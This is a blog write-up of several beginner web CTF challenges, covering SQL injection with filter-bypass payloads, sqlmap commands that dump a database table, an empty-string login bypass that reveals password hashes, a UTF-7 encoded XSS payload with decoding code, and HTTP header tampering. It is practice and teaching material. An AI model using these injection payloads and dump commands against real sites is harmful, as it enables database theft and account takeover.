A Write-up on SQL Injection - 小叶博客

Simple SQL injection 1:
Challenge URL: http://ctf5.shiyanbar.com/423/web/
Following the hint in the title, enter 1 in the input box;
the URL then becomes http://ctf5.shiyanbar.com/423/web/?id=1
Next, use the single-quote error method: append a single quote to the URL, which gives:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
It throws an error, so there is an injection point. Next, use a UNION query:
union select flag from flag where'1'='1
The table and column names are guessed, slowly, by pure mental effort; here I guessed flag for both.
The error message shows that the keywords are being filtered out, so try the simplest trick, doubling each keyword:
unionunion selectselect flag fromfrom flag wherewhere'1'='1
It still errors, and the error message shows that spaces are filtered as well:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'unionselectflag fromflag wherewhere'1'='1'' at line 1
So try using + as the separator instead; the query then becomes:
+unionunion+selectselect+flag+fromfrom+flag+wherewhere+'1'='1
And that successfully returns the flag we wanted:
ID: 1' union select flag from flag where'1'='1
name: baloteli
ID: 1' union select flag from flag where'1'='1
name: flag{Y0u_@r3_5O_dAmn_90Od}
Simple SQL injection 2:
Challenge URL: http://ctf5.shiyanbar.com/web/index_2.php
The steps are much the same as in the previous challenge, but when you try the UNION query the site responds SQLi detected!
So something in the statement is being filtered, and the error output is suppressed; this introduces a new concept, blind injection.
After some testing, union and the other keywords are not filtered, so the problem must be the spaces.
The old method no longer works, so try the comment bypass: replace every space with the comment /**/:
/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
This gives us the flag:
ID: 2'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
name: kanawaluo
ID: 2'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
name: flag{Y0u_@r3_5O_dAmn_90Od}
Simple SQL injection 3:
Challenge URL: http://ctf5.shiyanbar.com/web/index_3.php
This time the difficulty goes up again: the page either replies Hello or replies with a blank page.
We use the single-quote error method again (yes, the same error trick); the site's error message, including the file path, is:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\A1bnH3a\ctf\web\index_3.php on line 30
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Now this is interesting. When a file path is disclosed like this, the usual approach is to run sqlmap over it, especially on a site with such an obvious injection point. Without further ado, run it.
First enumerate the databases: sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs
It turns out there are 2 databases:
available databases [2]:
information_schema
web1
We don't know which database holds the flag, so list the tables directly: sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables
The web1 database turns out to contain the table we want;
the other table has quite a lot of data, so I won't paste it here.
Database: web1
[2 tables]
+---------------------------------------+
| flag |
| web_1 |
+---------------------------------------+
So dump the table we want, flag: sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 -D web1 -T flag -C flag --dump
That gives us the flag directly:
Database: web1
Table: flag
[1 entry]
+----------------------------+
| flag |
+----------------------------+
| flag{Y0u_@r3_5O_dAmn_90Od} |
+----------------------------+

I've been doing a lot of nasty challenges lately and my brain is a bit fried; they're all web challenges. I tried a crypto challenge and was completely lost.
I'll keep writing the write-ups in this post rather than opening a new one, to save space.

Anonymous login
Challenge URL: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
The challenge says everything has been filtered, so how do we inject?
A normal SQL statement would look like this:

Select * from user where username='$_POST';

$_POST is whatever we type in at login, so the injection idea is:
Select * from user where username='1'='1';
But the system errors, which means some characters are filtered. If 1 equals 1 can't get through, try empty equals empty:
Select * from user where username=''='';
(In MySQL this is evaluated left to right as (username='')='': the inner comparison yields 0, the empty string is cast to 0 in a numeric comparison, and 0=0 is true for every row.)
And we get the flag we wanted, together with the usernames and passwords:

ctf{51d1bf8fb65a8c2406513ee8f52283e7}
hint:
username:'='
password:'='
username password
hell02w 69bc7cf459bcff03625939193ec71e0e
w0d3rkun dbb9111e4ed03e2d4021c3c3b0ac8749
mut0r3nl 86846490336911c0f3c6e07cc197d22c

Cross-site scripting (XSS)
Challenge URL: http://ctf5.shiyanbar.com/basic/xss/
This is the challenge content:
http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-&_=1302746925413
Looking at that long string, the only idea that comes to mind is to decode it; the hint says XSS.
So use an online XSS decoder to do it:
http://web2hack.org/xssee/
The procedure is to Unescape (URL-decode) once first, which gives
http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=+/v+ +ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA+AC0-&_=1302746925413
Then copy the callback part (shown in red in the original post) and run UTF7 Decode on it to get the KEY:
+/v+ <script>alert("key:/%nsfocusXSStest%/")</script>-&_
Submit the KEY to get the flag:
<%
cmd = request.form("solution")
if (cmd = "/%nsfocusXSStest%/") then
    response.write("<script>alert('恭喜你答对了!过关KEY:%nsfocusXSStest%')</script>")
else
    response.write("<script>alert('不正确啊,再努力吧~!')</script>")
end if
%>
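The two-layer decoding the online tool performed can be scripted, which matters when there are many parameters to check rather than one. The Python below is an added example, not part of the original post or the challenge: it URL-decodes the query string of the challenge URL, then decodes every UTF-7 shift sequence it finds, leaving fragments that are not valid UTF-7 (such as the bare +/v+ byte-order-mark lead-in) untouched, and reports which parameters contain a script tag once both layers are off. The constants CHALLENGE_URL, SHIFT_SEQ and SCRIPT_TAG and the function names are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The challenge URL from this post, copied verbatim as the sample input.
CHALLENGE_URL = "http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-&_=1302746925413"

# A UTF-7 shift sequence: '+' then modified-base64 characters, optionally closed by '-'.
SHIFT_SEQ = re.compile(r"\+[A-Za-z0-9+/]*-?")

def decode_utf7_blocks(text):
    """Decode each UTF-7 shift sequence (+...-) found in text. A block that is not valid
    UTF-7, such as the bare '+/v+' byte-order-mark fragment in this payload, is kept as-is
    so that surrounding text is still decoded."""
    def replace(match):
        block = match.group(0)
        try:
            return block.encode("ascii").decode("utf-7")
        except UnicodeDecodeError:
            return block
    return SHIFT_SEQ.sub(replace, text)

def decoded_params(url):
    """Layer 1: URL-decode every query parameter (parse_qs turns %2b into '+' and %20 into
    a space). Layer 2: undo UTF-7 on each decoded value."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: [decode_utf7_blocks(v) for v in values] for name, values in params.items()}

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

def params_with_script(url):
    """Names of parameters that contain a script tag once both layers are removed; a
    check on the raw, still-encoded value would see nothing suspicious."""
    return [name for name, values in decoded_params(url).items()
            if any(SCRIPT_TAG.search(v) for v in values)]

if __name__ == "__main__":
    print(decoded_params(CHALLENGE_URL)["callback"][0])
    print("parameters carrying a script tag:", params_with_script(CHALLENGE_URL))
```

A UTF-7 payload like this one is only dangerous when the response does not declare a character set: older browsers (Internet Explorer in particular) then sniffed the content and could switch to UTF-7, turning +ADw- into a literal <. Sending an explicit Content-Type: text/html; charset=utf-8 on every response removes that whole class of problem; the decoder above is for finding such payloads in logs or during WAF rule review.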
Catch1
Challenge URL: http://ctf5.shiyanbar.com/basic/catch/
First use Firefox together with Burp Suite to capture the request,
then click Go and we see:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 09:48:02 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Row: MTQ5MTkwMzY4OA==
Content-Length: 14
Connection: close
Content-Type: text/html
Check Failed!

Extract MTQ5MTkwMzY4OA== and submit it as the key, which gives the KEY:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 09:48:40 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Row: MTQ5MTkwMzY4OA==
Content-Length: 21
Connection: close
Content-Type: text/html
KEY: #WWWnsf0cus_NET#

Another approach is to use the browser's built-in developer tools:
press F12, submit any key, open the Network tab and look at the response headers; the result is the same.
Catch2
Challenge URL: http://ctf5.shiyanbar.com/basic/header/
The error message tells us a header needs changing:
Forbidden
You don't have permission to access / on this server.
Make sure you are in HongKong
Same tool as before; once the request is captured, change zh-CN to zh-HK in the Accept-Language request header:

GET /basic/header/ HTTP/1.1
Host: ctf5.shiyanbar.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b9d3507a70c7abcd16f7165234e06374
Connection: close
Upgrade-Insecure-Requests: 1

After the change, we get the KEY:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 09:59:25 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Content-Length: 288
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>403 Forbidden</title> 
</head><body> 
<h1>Forbidden</h1> 
<p>You don't have permission to access /
on this server.</p> 
</body>
</html>
<br><br>KEY:123JustUserAGent<br><br>
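Both Catch challenges hinge on reading or rewriting a single header, which is easy to script once the raw capture is parsed. The Python below is an added example, not from the post: it parses the two raw HTTP messages shown above (embedded as constructed copies, with the session cookie replaced by a placeholder), base64-decodes the Content-Row value from the Catch1 response, and turns the Accept-Language header from the Catch2 request into an ordered preference list. Reading Content-Row as a Unix timestamp is an assumption; the write-up only shows that echoing the decoded value back satisfies the check. Function names are this example's own.

```python
import base64
from datetime import datetime, timezone

# Constructed copies of the two captures shown in this post (Catch1 response, Catch2 request);
# only the session cookie value has been replaced with a placeholder.
CATCH1_RESPONSE = """HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 09:48:02 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Row: MTQ5MTkwMzY4OA==
Content-Length: 14
Connection: close
Content-Type: text/html

Check Failed!
"""

CATCH2_REQUEST = """GET /basic/header/ HTTP/1.1
Host: ctf5.shiyanbar.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=<placeholder>
Connection: close
Upgrade-Insecure-Requests: 1
"""

def parse_http_message(raw):
    """Split a raw HTTP/1.x message into (start line, headers, body).
    Header names are case-insensitive, so they are keyed lower-case."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def content_row_value(raw_response):
    """Base64-decode the custom Content-Row header; the decoded string is what the
    Catch1 check wanted submitted back."""
    _, headers, _ = parse_http_message(raw_response)
    return base64.b64decode(headers["content-row"]).decode("ascii")

def content_row_as_time(raw_response):
    """Assumption: the decoded value is a Unix timestamp (a 10-digit number in the right range)."""
    return datetime.fromtimestamp(int(content_row_value(raw_response)), tz=timezone.utc)

def accept_language_preferences(raw_request):
    """Parse Accept-Language into (language tag, q) pairs, most preferred first. A server
    that treats this as the client's location is trusting a value the client sets freely."""
    _, headers, _ = parse_http_message(raw_request)
    prefs = []
    for item in headers.get("accept-language", "").split(","):
        tag, _, param = item.strip().partition(";")
        param = param.strip()
        q = float(param[2:]) if param.startswith("q=") else 1.0
        prefs.append((tag.strip(), q))
    return sorted(prefs, key=lambda p: -p[1])

if __name__ == "__main__":
    print("Content-Row decodes to", content_row_value(CATCH1_RESPONSE),
          "=", content_row_as_time(CATCH1_RESPONSE).isoformat())
    print("Accept-Language preferences:", accept_language_preferences(CATCH2_REQUEST))
```

The decoded Content-Row value is the same in both Catch1 responses on the page, and it sits about seven minutes before the Date header of the first, so it is not the current time; a value handed to the client in a header and then accepted back unchanged is not a secret the server can rely on. Likewise, the Catch2 check only ever sees the Accept-Language the client chose to send, which is why a one-token edit passes it.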